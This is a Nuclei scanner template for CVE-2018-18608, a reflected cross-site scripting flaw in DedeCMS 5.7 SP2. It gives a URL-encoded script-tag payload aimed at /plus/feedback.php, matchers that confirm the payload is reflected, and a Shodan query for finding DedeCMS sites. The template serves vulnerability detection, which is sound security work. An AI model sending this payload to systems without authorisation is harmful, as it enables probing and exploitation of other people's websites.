nuclei-templates/cves/2018/CVE-2018-18608.yaml

47 lines
1.4 KiB
YAML

id: CVE-2018-18608
info:
name: DedeCMS 5.7 SP2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
reference:
- https://github.com/ky-j/dedecms/issues/8
- https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
- https://nvd.nist.gov/vuln/detail/CVE-2018-18608
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18608
cwe-id: CWE-79
metadata:
shodan-query: http.html:"DedeCms"
verified: "true"
tags: dedecms,xss,cve,cve2018
requests:
- method: GET
path:
- "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'><script>alert(document.domain)</script>"
- "DedeCMS Error Warning!"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/18